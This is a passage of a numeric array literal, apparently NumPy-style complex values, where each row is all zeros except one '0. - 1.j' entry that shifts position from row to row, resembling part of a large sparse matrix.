0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
